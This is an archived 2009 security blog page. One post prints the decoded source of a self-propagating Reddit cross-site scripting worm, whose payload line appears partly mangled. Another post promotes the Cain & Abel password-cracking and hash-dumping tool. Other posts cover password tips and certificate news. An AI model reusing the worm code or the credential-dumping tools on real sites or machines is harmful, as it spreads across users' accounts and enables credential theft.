Reddit Javascript Worm?

September 27, 2009 – 10:13 PM

Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:

nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

    elements = document.getElementsByTagName('a');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML == 'reply') {
            $(elements[i]).click();
        }
    }

    elements = document.getElementsByTagName('textarea');

    for (i = 0; i < elements.length; i++)
        elements[i].value = nonsense;

    elements = document.getElementsByTagName('button');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML     == 'save'
        &&  elements[i].style.display != 'none') {
            $(elements[i]).click();
        }
    }

    ">x"

I’m not an expert so I can’t decipher what it’s doing up there with the nonsense bit. It looks like something akin to a quine. Any takers?

Update: sorry about the misleading title; I was under the mistaken impression that this was specific to Firefox. It appears to affect WebKit and Gecko browsers at least, but it didn’t hit me with Safari 4.

Source:
http://www.reddit.com/r/programming/comments/9oo8j/source_code_for_the_redditfirefox_exploit/

Posted in Coding, Internet | 1 Comment

Password Dos and Don’ts

September 27, 2009 – 12:19 PM

Here’s a great list of password dos and don’ts for you to make sure that you are using good, strong passwords and protecting your accounts as much as you possibly can.

DO use a password manager such as those reviewed by Scott Dunn in his Sept. 18, 2008, Insider Tips column.

DO change passwords frequently. I change mine every six months or whenever I sign in to a site I haven’t visited in long time. Don’t reuse old passwords. Password managers can assign expiration dates to your passwords and remind you when the passwords are about to expire.

DO keep your passwords secret. Putting them into a file on your computer, e-mailing them to others, or writing them on a piece of paper in your desk is tantamount to giving them away. If you must allow someone else access to an account, create a temporary password just for them and then change it back immediately afterward. No matter how much you may trust your friends or colleagues, you can’t trust their computers. If they need ongoing access, consider creating a separate account with limited privileges for them to use.

DON’T use passwords comprised of dictionary words, birthdays, family and pet names, addresses, or any other personal information. Don’t use repeat characters such as 111 or sequences like abc, qwerty, or 123 in any part of your password.

DON’T use the same password for different sites. Otherwise, someone who culls your Facebook or Twitter password in a phishing exploit could, for example, access your bank account.

DON’T allow your computer to automatically sign in on boot-up and thus use any automatic e-mail, chat, or browser sign-ins. Avoid using the same Windows sign-in password on two different computers.

DON’T use the “remember me” or automatic sign-in option available on many Web sites. Keep sign-ins under the control of your password manager instead.

DON’T enter passwords on a computer you don’t control — such as a friend’s computer — because you don’t know what spyware or keyloggers might be on that machine.

DON’T access password-protected accounts over open Wi-Fi networks — or any other network you don’t trust — unless the site is secured via https. Use a VPN if you travel a lot.

DON’T enter a password or even your account name in any Web page you access via an e-mail link. These are most likely phishing scams. Instead, enter the normal URL for that site directly into your browser, and proceed to the page in question from there.

Source:
http://windowssecrets.com/2009/08/06/01-Gmail-flaw-shows-value-of-strong-passwords/

Posted in Internet, Privacy, Security | No Comments

Internet Explorer supports free certificates

September 27, 2009 – 10:24 AM

With its last update, Microsoft has added StartCom to the pre-installed root certificates in its operating system. As a result, Microsoft products (such as Internet Explorer) now accept certificates issued by StartCom without prompting the user or requiring any special configurations for the certificates. Third-party programs that use the operating system’s certificate memory will also accept the certificates without asking further questions.

StartCom offers free certificates for the signing of e-mails (S/MIME) and for SSL server access, such as HTTPS. Unfortunately, with these “Class 1 certificates”, the applicant’s email address is generally the only thing tested.

While StartCom has been in the certificate store of Mozilla programs like Firefox and Thunderbird for some time, other issuers who offer free server certificates (such as CACert) are not currently included in the Root CA lists of commonly used programs. Users therefore have to inspect and confirm each server certificate or add the root certificate of such issuers to their certificate store.

The root certificate update is available as an option via Windows Update.

Source:
http://www.h-online.com/security/Internet-Explorer-supports-free-certificates–/news/114332

Posted in Internet, Privacy, Security, Windows | No Comments

Cain & Abel 4.9.32 released

September 25, 2009 – 6:11 PM

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.

New:

  • Added Abel64.exe and Abel64.dll to support hashes extraction on x64 operating systems.
  • Added x64 operating systems support in NTLM hashes Dumper, MS-CACHE hashes Dumper, LSA Secrets Dumper, Wireless Password Decoder, Credential Manager Password Decoder, DialUp Password Decoder.
  • Added Windows Live Mail (Windows 7) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
  • Fixed a bug of RSA SecurID Calculator within XML import function.
  • Executables rebuilt with Visual Studio 2008.

Download:
http://www.oxid.it/cain.html

Posted in Internet, Security, Software, Windows | No Comments

F-Secure Health Check 2.0 Beta

September 24, 2009 – 4:33 PM

F-Secure Health Check checks your computer for potentially unsafe software and, by suggesting solutions, helps you to resolve the situation before it turns into a problem. What security measures you take, is entirely up to you.

F-Secure Health Check does not check your computer for Viruses, Trojan Horses, Backdoors, Bots, Rootkits or other malware. Neither does F-Secure Health Check protect you against hackers and phishing attempts. Use your security software, such as F-Secure Internet Security or F-Secure Online Virus Scanner to scan your computer for malware.

health-check

2.0 Beta:
http://www.f-secure.com/en_EMEA/support/home-office/beta-programs/healthcheck/index.html

Posted in Internet, Security | No Comments

Copyright 2008-2024 PC Sympathy - Entries (RSS) - Sitemap